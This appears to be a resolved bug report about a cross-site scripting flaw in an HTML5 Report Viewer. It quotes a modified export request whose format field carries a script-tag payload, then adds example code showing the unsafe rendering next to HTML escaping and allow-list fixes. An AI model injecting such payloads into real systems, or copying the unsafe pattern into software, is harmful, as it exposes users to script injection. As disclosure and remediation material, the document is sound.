Completed
Last Updated: 22 Jan 2020 09:30 by ADMIN
Release 2020\R1
Nasi
Created on: 23 Dec 2019 09:43
Type: Bug Report
XSS attack in HTML5 Report Viewer

In HTML5 Report Viewer it is possible to intercept a client request (e.g. the request to export a report to a particular export format) and modify it like this:

{"format":"<script>alert(1)</script>","deviceInfo":{"enableAccessibility":false,"enableSearch":true,"BasePath":"/COAT_SIT/api/reports"},"useCache":true,"baseDocumentID":"31d0a1ca0162a3f13e92bf"}

The malicious script will be executed when the error message for a missing export format is displayed in the viewer.

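The defect class described in the report above (a user-controlled "format" value echoed into an error message that the viewer renders as HTML) side by side with its hardened form. This is an added illustration, not Telerik's HTML5 Report Viewer code: all function names, the allow-list of export formats and the message wording are hypothetical; the sample request body is constructed from the JSON quoted in the report.

```javascript
// Added example, not the Report Viewer's own code. Shows the reported defect
// class (untrusted "format" value rendered into an error message as HTML) and
// two defensive fixes: output encoding on the client, allow-list validation on
// the server. All names here are hypothetical.

// Sample request body, constructed to match the one quoted in the report.
const SAMPLE_REQUEST = JSON.stringify({
  format: "<script>alert(1)</script>",
  deviceInfo: {
    enableAccessibility: false,
    enableSearch: true,
    BasePath: "/COAT_SIT/api/reports",
  },
  useCache: true,
  baseDocumentID: "31d0a1ca0162a3f13e92bf",
});

// Hypothetical allow-list of export formats the server actually supports.
const KNOWN_FORMATS = new Set(["PDF", "XLSX", "CSV", "DOCX"]);

// Vulnerable pattern: the untrusted format name is concatenated straight into
// markup that later reaches innerHTML, so any HTML it contains is rendered.
function renderMissingFormatMessageUnsafe(format) {
  return `<div class="error">Export format '${format}' is not supported.</div>`;
}

// Minimal HTML entity encoder, safe for text nodes and quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened pattern: encode the value before it is interpolated into markup,
// so "<script>" arrives in the DOM as literal text, not as an element.
function renderMissingFormatMessageSafe(format) {
  return `<div class="error">Export format '${escapeHtml(format)}' is not supported.</div>`;
}

// Server-side counterpart: check the format against the allow-list before it
// is used anywhere, and do not echo the raw value back in the rejection.
function validateExportFormat(requestJson) {
  const body = JSON.parse(requestJson);
  const format = typeof body.format === "string" ? body.format.toUpperCase() : "";
  if (!KNOWN_FORMATS.has(format)) {
    return { ok: false, error: "Unsupported export format." };
  }
  return { ok: true, format };
}

// Helper used to demonstrate the difference: does the rendered markup still
// carry an unencoded <script> tag?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
const sampleFormat = JSON.parse(SAMPLE_REQUEST).format;
console.log("unsafe:", renderMissingFormatMessageUnsafe(sampleFormat));
console.log("safe:  ", renderMissingFormatMessageSafe(sampleFormat));
console.log("server:", validateExportFormat(SAMPLE_REQUEST));
```

Either fix on its own closes the reported path; applying both is the usual layering, since the server should never accept an unknown format and the client should never trust a string it puts into the DOM. A Content Security Policy that disallows inline scripts would further limit the impact of any similar injection that slips through.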